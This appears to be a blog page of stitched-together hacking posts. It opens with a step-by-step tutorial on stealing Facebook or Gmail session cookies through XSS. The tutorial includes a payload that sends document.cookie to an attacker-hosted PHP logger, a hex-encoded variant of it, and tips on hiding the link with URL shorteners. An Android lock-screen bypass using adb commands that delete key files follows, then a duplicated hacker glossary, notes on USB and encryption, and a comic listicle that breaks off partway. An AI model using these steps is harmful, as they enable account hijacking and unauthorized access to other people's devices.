Sunday, February 9, 2014

STEALING COOKIES TO HACK FACEBOOK OR GMAIL ID'S

STEALING COOKIES TO HACK FACEBOOK OR GMAIL ID'S

DIFFICULTY :- MEDIUM

Hope, you are now familiar with XSS vulnerability (if you don't know what it is, read the beginners xss tutorial). It is my Fourth article about the XSS Vulnerability Testing(PenTesting)..! Today i am going to explain how an attacker exploit XSS vulnerability and steal cookie from users.

Warning!!!
BTS does not take responsibility, if anyone, tries these hacks against any organization or whatever that makes him to trespass the security measures and brings him under the legal prosecution. This tutorial is intended for the improvement of security and for PenTesting, investigations by legal security agencies.

Requirements:
A cookie Stealer code : Get it from here
Free Web hosting service
Basic Knowledge about XSS
Basic Knowledge about Computer Cookies
Cookie stealing is the process of exploiting the XSS vulnerability (Non-persistent/persistent) and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.

Step 1: Creating Cookie Stealer PHP file
Get the Cookie stealer from the link i mentioned. In that post, i have explained three versions of cookie stealer. We are going to use the third version.
Copy the code.
Open Notepad and paste the code
Save the file with .php extension
Eg: Stealer.php
Now create New file and save it as log.txt (leave it as blank). Don't change the name , this is the file name what we give in php file.

Now you will have two files;
1. Stealer.php
2. log.txt

What these two files do exactly?
The above Stealer.php file get ip address,cookie and stores the data in log.txt file.
The log.txt has cookies , ip address details.

Step 2:
Register in a free web-hosting service and login into your cpanel.
Now open the File Manager in cpanel.
Upload the Stealer.php and log.txt to root folder or public_html folder.

Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

Step 3: Exploiting the XSS Vulnerability
So Far , we have sharpened our saw. Now we are going to use it.
Once you set up everything and find a Vulnerable site,then inject the following code in the Vulnerable sites.

<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie'+document.cookie;</script>
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie'+document.cookie;</script>

Cookie Stealing with Non-Persistent vs Persistent XSS:
Persistent: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it. It will be shown to all users. So attackers don't need to send any link to others. Whoever visit the page, they will be vicim.

Non-Persistent:
In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie. Most of sites are vulnerable to Non-persistent XSS .

In Non-persistence, Attackers will send the injected link victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie'+document.cookie;</script>

The above link is clearly shows the scripts. Hackers can Hex-encode this script so that victim can't see the script.
For Example:
hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e
Still , the link look long. The attacker use one more trick to hide the long url i.e url shortening sites. There are lot of sites that shorten the long url into tiny url.

For example:
hxxp://www.tinyexample.com/twrwd63

Once the victim follow the link, his cookie will be stored in log.txt file.

How to be Secure from this attack?
Use No-Script Addon. This is best protection to stay away from XSS
Never Click the Shorten url
Sometime you may want to follow the shorten link. If so, then clear all cookies in your browser and visit through Proxy or VPN(it will hide your ip).

HACKING / BYPASS ANDROID PATTERN LOCK / PIN LOCK /FACE-LOCK

HACKING / BYPASS ANDROID PATTERN LOCK / PIN LOCK /FACE-LOCK
Photo: HACKING / BYPASS ANDROID PATTERN LOCK / PIN LOCK /FACE-LOCK

1)- TO ENABLE WIFI FOR INTERNET ACCESS TO UNLOCK BY CONNECTING GOOGLE ACOUNT
connect your anddoid device to pc
in the adb shell type the below code and hit enter to enable WIFI

adb shell svc wifi enable

2)-Solution For Everyone Without Recovery Installed - ADB :

What You Need:
A computer running a Linux distro or Windows+Cygwin
USB cable to connect your phone to the PC
Adb installed :

How to install adb:

1. Open Terminal
2. Type:

sudo apt-get install android-tools-adb

3. Follow the instructions until everything is installed
INSTRUCTIONS:

1. Connect you (turned on) Phone to the Computer via USB.
2. Open a terminal window.
3. Type

adb devices
adb shell
cd data/system
su
rm *.key


Solution For Everyone With Recovery (Cwm, Twrp, Xrec,Etc...) Installed:

INSTRUCTIONS:

1. Download this zip Pattern Password Disable ( http://d-h.st/HXP ) on to your sdcard (using your PC, as you cant get into your phone, right )
2. Insert the sdcard into your phone
3. Reboot into recovery mode
4. Flash the zip
5. Reboot
6. Done! :)


Follow the Admin:-https://www.facebook.com/hackerohit

1)- TO ENABLE WIFI FOR INTERNET ACCESS TO UNLOCK BY CONNECTING GOOGLE ACOUNT
connect your anddoid device to pc
in the adb shell type the below code and hit enter to enable WIFI

adb shell svc wifi enable

2)-Solution For Everyone Without Recovery Installed - ADB :

What You Need:
A computer running a Linux distro or Windows+Cygwin
USB cable to connect your phone to the PC
Adb installed :

How to install adb:

1. Open Terminal
2. Type:

sudo apt-get install android-tools-adb

3. Follow the instructions until everything is installed
INSTRUCTIONS:

1. Connect you (turned on) Phone to the Computer via USB.
2. Open a terminal window.
3. Type

adb devices
adb shell
cd data/system
su
rm *.key


Solution For Everyone With Recovery (Cwm, Twrp, Xrec,Etc...) Installed:

INSTRUCTIONS:

1. Download this zip Pattern Password Disable ( http://d-h.st/HXP) on to your sdcard (using your PC, as you cant get into your phone, right )
2. Insert the sdcard into your phone
3. Reboot into recovery mode
4. Flash the zip
5. Reboot
6. Done! 


Follow the Admin:-
https://www.facebook.com/GalaxyHacker

Hacker's Dictionary For You..

Photo: Hacker's Dictionary For You..

★ DDoS =
Distributed Denial of Service
★ DrDoS =
Distributed Reflected Denial of Service Attack,
uses a list of reflection servers or other methods
such as DNS to spoof an attack to look like it's
coming from multiple ips. Amplification of
power in the attack COULD occur.
★ FTP =
File Transfer Protocol. Used for transferring files
over an FTP server.
★ FUD =
Fully Undetectable
★ Hex =
In computer science, hexadecimal refers to
base-16 numbers. These are numbers that use
digits in the range: 0123456789ABCDEF. In the
C programming language (as well as Java,
JavaScript, C++, and other places), hexadecimal
numbers are prefixed by a 0x. In this manner,
one can tell that the number 0x80 is equivalent
to 128 decimal, not 80 decimal.
★ HTTP =
Hyper Text Transfer Protocol. The foundation of
data communication for the World Wide Web.
★ IRC =
Internet Relay Chat. Transmiting text messages
in real time between online users.
★ JDB =
Java drive-by, a very commonly used web-
based exploit which allows an attacker to
download and execute malicious code locally
on a slave's machine through a widely known
java vulnerability.
★ Malware =
Malicious Software
★ Nix =
Unix based operating system, usually refered to
here when refering to DoS'ing.
★ POP3 =
This is the most popular protocol for picking up
e-mail from a server.
★ R.A.T = Remote Administration Tool
★ SDB =
Silent drive-by, using a zero day web-based
exploit to hiddenly and un-detectably download
and execute malicious code on a slave's
system. (similar to a JDB however no
notification or warning is given to the user)
★ SE =
Social Engineering
★ Skid =
Script Kid/Script Kiddie
★ SMTP =
A TCP/IP protocol used in sending and
receiving e-mail.
★ SQL =
Structured Query Language. It's a programming
language, that used to communicate with
databases and DBMS. Can go along with a
word after it, such as "SQL Injection."
★ SSH =
Secure Shell, used to connect to Virtual Private
Servers.
★ TCP =
Transmission Control Protocol, creates
connections and exchanges packets of data.
★ UDP =
User Datagram Protocol, An alternative data
transport to TCP used for DNS, Voice over IP,
and file sharing.
★ VPN =
Virtual Private Network
★ VPS =
Virtual Private Server
★ XSS (CSS) =
Cross Site Scripting
Words
Algorithm =
A series of steps specifying which actions to
take in which order.
ANSI Bomb =
ANSI.SYS key-remapping commands consist of
cryptic-looking text that specifies, using ansi
numeric codes to redefine keys.
Back Door =
Something a hacker leaves behind on a system
in order to be able to get back in at a later
time.
Binary =
A numbering system in which there are only two
possible values for each digit: 0 and 1.
Black Hat =
A hacker who performs illegal actions to do
with hacking online. (Bad guy, per se)
Blue Hat =
A blue hat hacker is someone outside computer
security consulting firms who is used to bug
test a system prior to its launch, looking for
exploits so they can be closed. Microsoft also
uses the term BlueHat to represent a series of
security briefing events.
Bot =
A piece of malware that connects computer to
an attacker commonly using the HTTP or IRC
protocal to await malicous instructions.
Botnet =
Computers infected by worms or Trojans and
taken over by hackers and brought into
networks to send spam, more viruses, or launch
denial of service attacks.
Buffer Overflow =
A classic exploit that sends more data than a
programmer expects to receive. Buffer overflows
are one of the most common programming
errors, and the ones most likely to slip through
quality assurance testing.
Cracker =
A specific type of hacker who decrypts
passwords or breaks software copy protection
schemes.
DDoS =
Distributed denial of service. Flooding someones
connection with packets. Servers or web-hosted
shells can send packets to a connection on a
website usually from a booter.
Deface =
A website deface is an attack on a site that
changes the appearance of the site or a certain
webpage on the site.
Dictionary Attack =
A dictionary attack is an attack in which a
cyber criminal can attempt to gain your account
password. The attack uses a dictionary file, a
simple list of possible passwords, and a
program which fills them in. The program just
fills in every single possible password on the
list, untill it has found the correct one.
Dictionary files usually contain the most
common used passwords.
DOX =
Personal information about someone on the
Internet usualy contains real name, address,
phone number, SSN, credit card number, etc.
E-Whore =
A person who manipulates other people to
believe that he/she is a beautiful girl doing cam
shows or selling sexual pictures to make
money.
Encryption = I
n cryptography, encryption applies
mathematical operations to data in order to
render it incomprehensible. The only way to
read the data is apply the reverse mathematical
operations. In technical speak, encryption is
applies mathematical algorithms with a key
that converts plaintext to ciphertext. Only
someone in possession of the key can decrypt
the message.
Exploit =
A way of breaking into a system. An exploit
takes advantage of a weakness in a system in
order to hack it.
FUD =
Fully undetectable, can be used in many terms.
Generally in combination with crypters, or when
trying to infect someone.
Grey Hat =
A grey hat hacker is a combination of a Black
Hat and a White Hat Hacker. A Grey Hat Hacker
may surf the internet and hack into a computer
system for the sole purpose of notifying the
administrator that their system has been
hacked, for example. Then they may offer to
repair their system for a small fee.
Hacker (definition is widely disputed among
people...) = A hacker is someone who is able to
manipulate the inner workings of computers,
information, and technology to work in his/her
favor.
Hacktivist =
A hacktivist is a hacker who utilizes technology
to announce a social, ideological, religious, or
political message. In general, most hacktivism
involves website defacement or denial-of-servi
ce attacks.
IP Address =
On the Internet, your IP address is the unique
number that others use to send you traffic.
IP Grabber =
A link that grabs someone's IP when they visit
it.
Keylogger =
A software program that records all keystrokes
on a computer's keyboard, used as a
surveillance tool or covertly as spyware.
Leach = A cultural term in the warez community
referring to people who download lots of stuff
but never give back to the community.
LOIC/HOIC =
Tool(s) used by many anonymous members to
conduct DDoS attacks. It is not recommended to
use these under any circumstances.
Malware =
Software designed to do all kinds of evil stuff
like stealing identity information, running DDoS
attacks, or soliciting money from the slave.
Neophyte =
A neophyte, "n00b", or "newbie" is someone who
is new to hacking or phreaking and has almost
no knowledge or experience of the workings of
technology, and hacking.
smith =
Somebody new to a forum/game.
OldFag =
Somebody who's been around a forum/game for
a long time.
Packet =
Data that is sent across the Internet is broken
up into packets, sent individually across the
network, and reassembled back into the original
data at the other end.
Phreak =
Phone Freaks. Hackers who hack cell phones for
free calling. Free Long distance calling. Etc.
Phreaking =
The art and science of cracking the phone
network.
Proxy =
A proxy is something that acts as a server, but
when given requests from clients, acts itself as
a client to the real servers.
Rainbow Table =
A rainbow table is a table of possible
passwords and their hashes. It is way faster to
crack a password using rainbow tables then
using a dictionary attack (Bruteforce).
Remote Administration Tool =
A tool which is used to remotely control
(an)other machine(s). These can be used for
monitoring user actions, but often misused by
cyber criminals as malware, to get their hands
on valuable information, such as log in
credentials.
Resolver =
Software created to get an IP address through
IM (instant messenger, like Skype/MSN)
programs.
Reverse Engineering =
A technique whereby the hacker attempts to
discover secrets about a program. Often used
by crackers, and in direct modifications to a
process/application.
Root =
Highest permission level on a computer, able to
modify anything on the system without
restriction.
Rootkit (ring3 ring0) =
A powerful exploit used by malware to conceal
all traces that it exists. Ring3 - Can be
removed easily without booting in safemode.
Ring0 - Very hard to remove and very rare in
the wild, these can require you to format, it's
very hard to remove certain ring0 rootkits
without safemode.
Script Kiddie =
A script kid, or skid is a term used to describe
those who use scripts created by others to hack
computer systems and websites. Used as an
insult, meaning that they know nothing about
hacking.
Shell =
The common meaning here is a hacked web
server with a DoS script uploaded to conduct
DDoS attacks via a booter. OR A shell is an
script-executing unit - Something you'd stick
somewhere in order to execute commands of
your choice.
Social Engineer =
Social engineering is a form of hacking that
targets people's minds rather than their
computers. A typical example is sending out
snail mail marketing materials with the words
"You may already have won" emblazoned
across the outside of the letter. As you can see,
social engineering is not unique to hackers; it's
main practitioners are the marketing
departments of corporations.
Spoof =
The word spoof generally means the act of
forging your identity. More specifically, it refers
to forging the sender's IP address (IP spoofing).
(Spoofing an extension for a RAT to change it
from .exe to .jpg, etc.)
SQL Injection =
An SQL injection is a method often used to
hack SQL databases via a website, and gain
admin control (sometimes) of the site. You can
attack programs with SQLi too.
Trojan =
A Trojan is a type of malware that masquerades
as a legitimate file or helpful program with the
ultimate purpose of granting a hacker
unauthorized access to a computer.
VPS =
The term is used for emphasizing that the
virtual machine, although running in software
on the same physical computer as other
customers' virtual machines, is in many
respects functionally
equivalent to a separate physical computer, is
dedicated to the individual customer's needs,
has the privacy of a separate physical
computer, and can be configured to run server
software.
Warez =
Software piracy
White Hat =
A "white hat" refers to an ethical hacker, or a
computer security expert, who specializes in
penetration testing and in other testing methods
to ensure the security of a businesses
information systems. (Good guy, per se)
Worm =
Software designed to spread malware with little
to no human interaction.
Zero Day Exploit =
An attack that exploits a previously unknown
vulnerability in a computer application, meaning
that the attack occurs on "day zero" of
awareness of the vulnerability. This means that
the developers have had zero days to address
and patch the vulnerability.
Hacker's Dictionary For You..


★ DDoS =
Distributed Denial of Service
★ DrDoS =
Distributed Reflected Denial of Service Attack,
uses a list of reflection servers or other methods
such as DNS to spoof an attack to look like it's
coming from multiple ips. Amplification of
power in the attack COULD occur.
★ FTP =
File Transfer Protocol. Used for transferring files
over an FTP server.
★ FUD =
Fully Undetectable
★ Hex =
In computer science, hexadecimal refers to
base-16 numbers. These are numbers that use
digits in the range: 0123456789ABCDEF. In the
C programming language (as well as Java,
JavaScript, C++, and other places), hexadecimal
numbers are prefixed by a 0x. In this manner,
one can tell that the number 0x80 is equivalent
to 128 decimal, not 80 decimal.
★ HTTP =
Hyper Text Transfer Protocol. The foundation of
data communication for the World Wide Web.
★ IRC =
Internet Relay Chat. Transmiting text messages
in real time between online users.
★ JDB =
Java drive-by, a very commonly used web-
based exploit which allows an attacker to
download and execute malicious code locally
on a slave's machine through a widely known
java vulnerability.
★ Malware =
Malicious Software
★ Nix =
Unix based operating system, usually refered to
here when refering to DoS'ing.
★ POP3 =
This is the most popular protocol for picking up
e-mail from a server.
★ R.A.T = Remote Administration Tool
★ SDB =
Silent drive-by, using a zero day web-based
exploit to hiddenly and un-detectably download
and execute malicious code on a slave's
system. (similar to a JDB however no
notification or warning is given to the user)
★ SE =
Social Engineering
★ Skid =
Script Kid/Script Kiddie
★ SMTP =
A TCP/IP protocol used in sending and
receiving e-mail.
★ SQL =
Structured Query Language. It's a programming
language, that used to communicate with
databases and DBMS. Can go along with a
word after it, such as "SQL Injection."
★ SSH =
Secure Shell, used to connect to Virtual Private
Servers.
★ TCP =
Transmission Control Protocol, creates
connections and exchanges packets of data.
★ UDP =
User Datagram Protocol, An alternative data
transport to TCP used for DNS, Voice over IP,
and file sharing.
★ VPN =
Virtual Private Network
★ VPS =
Virtual Private Server
★ XSS (CSS) =
Cross Site Scripting
Words
Algorithm =
A series of steps specifying which actions to
take in which order.
ANSI Bomb =
ANSI.SYS key-remapping commands consist of
cryptic-looking text that specifies, using ansi
numeric codes to redefine keys.
Back Door =
Something a hacker leaves behind on a system
in order to be able to get back in at a later
time.
Binary =
A numbering system in which there are only two
possible values for each digit: 0 and 1.
Black Hat =
A hacker who performs illegal actions to do
with hacking online. (Bad guy, per se)
Blue Hat =
A blue hat hacker is someone outside computer
security consulting firms who is used to bug
test a system prior to its launch, looking for
exploits so they can be closed. Microsoft also
uses the term BlueHat to represent a series of
security briefing events.
Bot =
A piece of malware that connects computer to
an attacker commonly using the HTTP or IRC
protocal to await malicous instructions.
Botnet =
Computers infected by worms or Trojans and
taken over by hackers and brought into
networks to send spam, more viruses, or launch
denial of service attacks.
Buffer Overflow =
A classic exploit that sends more data than a
programmer expects to receive. Buffer overflows
are one of the most common programming
errors, and the ones most likely to slip through
quality assurance testing.
Cracker =
A specific type of hacker who decrypts
passwords or breaks software copy protection
schemes.
DDoS =
Distributed denial of service. Flooding someones
connection with packets. Servers or web-hosted
shells can send packets to a connection on a
website usually from a booter.
Deface =
A website deface is an attack on a site that
changes the appearance of the site or a certain
webpage on the site.
Dictionary Attack =
A dictionary attack is an attack in which a
cyber criminal can attempt to gain your account
password. The attack uses a dictionary file, a
simple list of possible passwords, and a
program which fills them in. The program just
fills in every single possible password on the
list, untill it has found the correct one.
Dictionary files usually contain the most
common used passwords.
DOX =
Personal information about someone on the
Internet usualy contains real name, address,
phone number, SSN, credit card number, etc.
E-Whore =
A person who manipulates other people to
believe that he/she is a beautiful girl doing cam
shows or selling sexual pictures to make
money.
Encryption = I
n cryptography, encryption applies
mathematical operations to data in order to
render it incomprehensible. The only way to
read the data is apply the reverse mathematical
operations. In technical speak, encryption is
applies mathematical algorithms with a key
that converts plaintext to ciphertext. Only
someone in possession of the key can decrypt
the message.
Exploit =
A way of breaking into a system. An exploit
takes advantage of a weakness in a system in
order to hack it.
FUD =
Fully undetectable, can be used in many terms.
Generally in combination with crypters, or when
trying to infect someone.
Grey Hat =
A grey hat hacker is a combination of a Black
Hat and a White Hat Hacker. A Grey Hat Hacker
may surf the internet and hack into a computer
system for the sole purpose of notifying the
administrator that their system has been
hacked, for example. Then they may offer to
repair their system for a small fee.
Hacker (definition is widely disputed among
people...) = A hacker is someone who is able to
manipulate the inner workings of computers,
information, and technology to work in his/her
favor.
Hacktivist =
A hacktivist is a hacker who utilizes technology
to announce a social, ideological, religious, or
political message. In general, most hacktivism
involves website defacement or denial-of-servi
ce attacks.
IP Address =
On the Internet, your IP address is the unique
number that others use to send you traffic.
IP Grabber =
A link that grabs someone's IP when they visit
it.
Keylogger =
A software program that records all keystrokes
on a computer's keyboard, used as a
surveillance tool or covertly as spyware.
Leach = A cultural term in the warez community
referring to people who download lots of stuff
but never give back to the community.
LOIC/HOIC =
Tool(s) used by many anonymous members to
conduct DDoS attacks. It is not recommended to
use these under any circumstances.
Malware =
Software designed to do all kinds of evil stuff
like stealing identity information, running DDoS
attacks, or soliciting money from the slave.
Neophyte =
A neophyte, "n00b", or "newbie" is someone who
is new to hacking or phreaking and has almost
no knowledge or experience of the workings of
technology, and hacking.
smith =
Somebody new to a forum/game.
OldFag =
Somebody who's been around a forum/game for
a long time.
Packet =
Data that is sent across the Internet is broken
up into packets, sent individually across the
network, and reassembled back into the original
data at the other end.
Phreak =
Phone Freaks. Hackers who hack cell phones for
free calling. Free Long distance calling. Etc.
Phreaking =
The art and science of cracking the phone
network.
Proxy =
A proxy is something that acts as a server, but
when given requests from clients, acts itself as
a client to the real servers.
Rainbow Table =
A rainbow table is a table of possible
passwords and their hashes. It is way faster to
crack a password using rainbow tables then
using a dictionary attack (Bruteforce).
Remote Administration Tool =
A tool which is used to remotely control
(an)other machine(s). These can be used for
monitoring user actions, but often misused by
cyber criminals as malware, to get their hands
on valuable information, such as log in
credentials.
Resolver =
Software created to get an IP address through
IM (instant messenger, like Skype/MSN)
programs.
Reverse Engineering =
A technique whereby the hacker attempts to
discover secrets about a program. Often used
by crackers, and in direct modifications to a
process/application.
Root =
Highest permission level on a computer, able to
modify anything on the system without
restriction.
Rootkit (ring3 ring0) =
A powerful exploit used by malware to conceal
all traces that it exists. Ring3 - Can be
removed easily without booting in safemode.
Ring0 - Very hard to remove and very rare in
the wild, these can require you to format, it's
very hard to remove certain ring0 rootkits
without safemode.
Script Kiddie =
A script kid, or skid is a term used to describe
those who use scripts created by others to hack
computer systems and websites. Used as an
insult, meaning that they know nothing about
hacking.
Shell =
The common meaning here is a hacked web
server with a DoS script uploaded to conduct
DDoS attacks via a booter. OR A shell is an
script-executing unit - Something you'd stick
somewhere in order to execute commands of
your choice.
Social Engineer =
Social engineering is a form of hacking that
targets people's minds rather than their
computers. A typical example is sending out
snail mail marketing materials with the words
"You may already have won" emblazoned
across the outside of the letter. As you can see,
social engineering is not unique to hackers; it's
main practitioners are the marketing
departments of corporations.
Spoof =
The word spoof generally means the act of
forging your identity. More specifically, it refers
to forging the sender's IP address (IP spoofing).
(Spoofing an extension for a RAT to change it
from .exe to .jpg, etc.)
SQL Injection =
An SQL injection is a method often used to
hack SQL databases via a website, and gain
admin control (sometimes) of the site. You can
attack programs with SQLi too.
Trojan =
A Trojan is a type of malware that masquerades
as a legitimate file or helpful program with the
ultimate purpose of granting a hacker
unauthorized access to a computer.
VPS =
The term is used for emphasizing that the
virtual machine, although running in software
on the same physical computer as other
customers' virtual machines, is in many
respects functionally
equivalent to a separate physical computer, is
dedicated to the individual customer's needs,
has the privacy of a separate physical
computer, and can be configured to run server
software.
Warez =
Software piracy
White Hat =
A "white hat" refers to an ethical hacker, or a
computer security expert, who specializes in
penetration testing and in other testing methods
to ensure the security of a businesses
information systems. (Good guy, per se)
Worm =
Software designed to spread malware with little
to no human interaction.
Zero Day Exploit =
An attack that exploits a previously unknown
vulnerability in a computer application, meaning
that the attack occurs on "day zero" of
awareness of the vulnerability. This means that
the developers have had zero days to address
and patch the vulnerability.

Inside USB.

Inside USB.

1 USB Standard, Male A-plug
2 USB mass storage controller device
3 Test points
4 Flash memory chip
5 Crystal oscillator
6 LED (Optional)
7 Write-protect switch (Optional)
8 Space for second flash memory chip

What Is Encryption


Encryption is a method or a technique used to encode a message so that it can’t be read by a normal user/person. Its an art of secret writing, It can also be defined as converting information from plain text using an algorithm or a cipher to make it unreadable, So that the converted information can only be read by the person who is having the special knowledge. The process of encoding is known as Encryption and its reverse process i.e. decoding it is known as Decryption. Encryption is very useful when it comes to protecting your confidential data from being stolen. It is helpful when data is transmitted over the network, it safe guards you data from sniffers. When data is needed to be encrypted over a network, SSL Protocol is used for encryption purpose. SSL stands for Secure Socket Layer.

Types of Encryption

Symmetrical Key : This type of encryption is also know as Shared Key Secret. In symmetrical encryption, the key which is used in the process of encryption, that same key is also used in the process of decryption. If two parties want to exchange the encrypted data securely, both of them should have the same copy of symmetric key.

Asymmetrical Key : This type of encryption is also know as Public Key. In this type of encryption, keys are generated in pairs, public key and private key. In asymmetrical encryption key used to encipher is different from the key used to decipher. Therefore the two partners have two different keys, one is made public and other one is made private. Let’s take up an example to understand the concept in an easy way.
Suppose, John wants to send a message to Mike, he just ciphers the message with the public key and sends it to Mike. Since Mike is having the secret key, he can and decipher the message and read its content.

8 Things You Won't Believe Can Be Hacked



If movies are to be believed, hackers are mostly kept busy fighting the man with CGI animations of smiley faces, or else dwelling in the darkest corners of their mothers' basements and doing purely nerdy stuff that never affects the real world. But neither assumption is true: Hacking does not look like a rad skateboarder busting a kickflip over an onyx tower, and hackers do gain access to things that can affect your daily life ... and sometimes, even end it.

#8. Explode Your Genitals

We think we have a pretty good idea of what hackers are capable of: stealing your personal information, crashing your computer, Rollerblading like a sonofabitch and making out with Angelina Jolie (back when she was hot, before her alien DNA kicked in and she started looking like a hawk-monster).
But today's hackers have finally crossed a line, and must be terminated with extreme prejudice. The offense? They're trying to destroy your wang.
Photos.com
"The good news is that your leg is going to be fine ..."
The newest MacBooks contain batteries with small monitor chips installed. It's such a discreet addition that Apple didn't feel the need to secure it, which of course means that hackers everywhere had to immediately set to work exploiting it. It gets pretty technical, but the gist of the process is this: The software uses a default password, which is the same in every single MacBook. By reverse engineering the firmware, hackers can render the battery useless or inject malware into the system through the chip (and you couldn't even wipe your hard drive and reformat the system to get rid of it, because you probably won't think to check your battery for a virus).

"Is it enough to Sharpie 'Avira' onto them?"
Or, if they're feeling particularly villainous, they could just overheat the battery of your laptop (so named because it sits on top of your lap, which, you'll recall, is where you keep your junk) to the point of bursting into flames or exploding. That's right: Hackers are after your penis.
There is just no version of that sentence that is anything less than terrifying.
Photos.com
"Definitely that guy. You don't play a druid without repercussions."

#7. Cut Your Car's Brakes

Security specialists at the University of Washington and the University of California have shown that new cars with computer systems onboard face a real security threat from hackers. These scientists were able to gain control of two vehicles and operate more than a dozen functions while the cars were in motion. This included things like braking, selective braking of each wheel (thus effectively "steering" the car) and shutting off the engine completely. Scarier still is that once they gained control of the vehicles, driver input was totally ignored: The pedals, wheel and switches all had no effect. They were also able to launch a "composite attack," in which the malicious software would be erased after a crash, effectively leaving no evidence of tampering.
Photos.com
Just a quick flash of smoke followed by confusion and a throwing star.
Being vehicular-manslaughtered by cyberwarriors is the worst case scenario, of course.
It's far more likely that these exploits will be used to simply steal the cars. Experts are predicting that the future of car theft is a split venture, with hackers selling their services to car thieves by providing them with the GPS location of the vehicle, then unlocking the door and starting the engine remotely so the thieves can drive off with it. Possible points of entry for a car hacker are through Bluetooth, a cellular network, thefreaking tire pressure monitor and even music files. Yes, the next song you download could be your last, if the wrong hacker has been into it. So while we agree that Journey's Greatest Hits is indeed a sweet album that you totally need for that road trip, you have to ask yourself the question: Is it worth dying for?
Via Mevio.com
We'll never stop believin'.
(The answer is yes, obviously.)

#6. Control a Nuclear Power Plant

When Scott Lunsford, a researcher for IBM's Internet Security Systems, told the owners of an American nuclear power station that he could hack into their system through the Internet, they laughed in his face. They told him that he couldn't do it; that it was "impossible." Then they left to look up the word "hubris" in the dictionary while Lunsford hacked the holy shit out of their systems. It took his team less than a day to infiltrate and less than a week to take full control of the nuclear power station. He claimed it was "one of the easiest penetration tests" he had ever performed.
Photos.com
We're pretty sure he was talking about the colons of the owners.
While he couldn't have caused anything like a meltdown, Lunsford is still convinced that if he had been inclined, he could have done some significant damage within the system. All it would have taken was simply "closing a valve" to shut off power to most of a city. The particular system Lunsford hacked to gain control of the plant is powered by something called SCADA (Supervisory Control and Data Acquisition) software, and the bad news is that so is most of the rest of America's infrastructure. SCADA controls things like water filtration plants and subway networks all across the nation, and its security is becoming weaker by the day, mostly due to ever-increasing Internet connectivity. Lunsford imagines a variety of catastrophic possibilities if cyber-terrorists ever learned of these exploits in the SCADA system, like he just did, and like we're telling you about right now (uh ... sorry, America).
Via Imap.net
Eh, New York doesn't need electricity anyway.

#5. Use Your Computer Screen as a Two-Way Mirror

Odds are that if you're reading this, you have a Webcam pointed at you right now and -- NO DON'T LOOK AT IT! Just be cool, OK? Act natural ...
Most likely, there's nobody watching you. We assume even bored hackers have better things to do than watch someone play Call of Duty and distractedly drop Fritos on their underwear. But if a hacker ever did want to gain control of your Webcam to spy on you, it's very doable. In fact, improperly or entirely unsecured Webcams have entire sites devoted to them: Here's a whole subreddit of controllable Webcams that you're going to lose an entire afternoon clicking on, just because you can.
Photos.com
They've been standing like that for six hours. And it is so hot.
Webcam manufacturers are well aware of this problem, too. Companies like Logitech are already fitting their Webcams with privacy shields (a fancy term for "lens caps") to protect their users against unwanted access. As far as a motive for this kind of invasion of privacy, there are few reasons to hack a civilian's personal Webcam short of spying on women changing ... aaaand that's exactly what the majority of cases turn out to be.
So if you're an attractive woman reading this and you're worried about your privacy, check for the LED indicator next to your Webcam to see when it's active. And, uh ... maybe send us a thank you message for introducing this vital information to you, and then just continue about your normal business: checking your email topless.

#4. Shower in Free Money

Remember the "easy money" scene from Terminator 2, when John Connor and his friend hack an ATM with a portable Atari computer? That wasn't fiction. (Well, that one part, anyway. The rest of that movie was absolutely fictional. Sentient killer skeleton robots do not exist, and "Hasta la vista, baby" is not a thing that reasonable human beings say to one another.) Unlike most companies, ATM designers haven't been getting hacked much in the last decade or so, and as such, their security measures are slightly behind the curve.
At last year's Black Hat technical security conference, IOActive Labs' Director of Security Research, Barnaby Jack, wanted to demonstrate just how easy it was to hack a couple of ATMs. He didn't need to open up the machine or even make a withdrawal to accomplish this. He did everything entirely remotely, using only his laptop and a program called Jackpot. When he was done, a jaunty little tune played on his speakers, the word "jackpot" flashed on his screen, and the ATM started spitting out bills all over the place, presumably while Barnaby kicked his heels together and yipped like an old-timey prospector.

Roughly 40 percent of you are now typing "Jackpot full download" into Google.

#3. Crash the National Power Grid

By 2020, the U.K. wants to have a smart meter in every home to measure gas and electricity consumption. The devices send real-time data directly to the utility companies through a Web connection, thus providing customers with constantly updated information on energy conservation while simultaneously helping to manage national demand more efficiently. The smart meter sounds like a reasonable idea to us working stiffs (well, we're not really working, but we sure are stiff!), but where we see just a little gray box outside that gives us power, a hacker sees a bunch of low-hanging fruit with minimal security, spanning the entire country.
Photos.com
Time to bake some hack pie, baby!
If just one of these boxes was infected with a worm, it could theoretically bring down the entire grid. In the case of the U.K.'s future national "smart grid" plan, that could potentially mean cutting the power off to an entire country.
Via Guineveregetssober.com
That's why the really good Modern Warfare players own generators.
Worldwide, there are already 40 million smart meters in use, and several of those networks operate in the U.S. Yet another team from IOActive (these guys are starting to sound like equal parts Robin Hood and Doctor Doom, aren't they?) developed a worm and used it to illustrate the security flaws in these systems. With this worm in place, they did exactly what they warned, and successfully took control of an entire American power grid. Mike Davis, a senior consultant for the firm, issued this ominous statement: "We can switch off hundreds of thousands of homes potentially at the same time." He didn't append the statement with a list of demands or anything, but we're forced to assume that it was followed by some sort of maniacal cackling.

#2. Stop Your Heart

Everything from your car to your blender is getting upgraded with a computer chip these days. Medical implants like pacemakers are no exception. Since they need to be updated somewhat remotely anyway (otherwise all maintenance would involve major surgery), they do have limited outside connectivity, allowing doctors to access your stored medical history, your name and address and your doctor's name and address. Oh, and a skilled hacker can access all of it, too.
That's right: They can hack your goddamn heart.
And as if we need to say it: Obviously they can remotely stop it beating while they're in there.
Photos.com
"Damn you, V4g1n@B00bs87! Daaammnnn yoooouu ..."
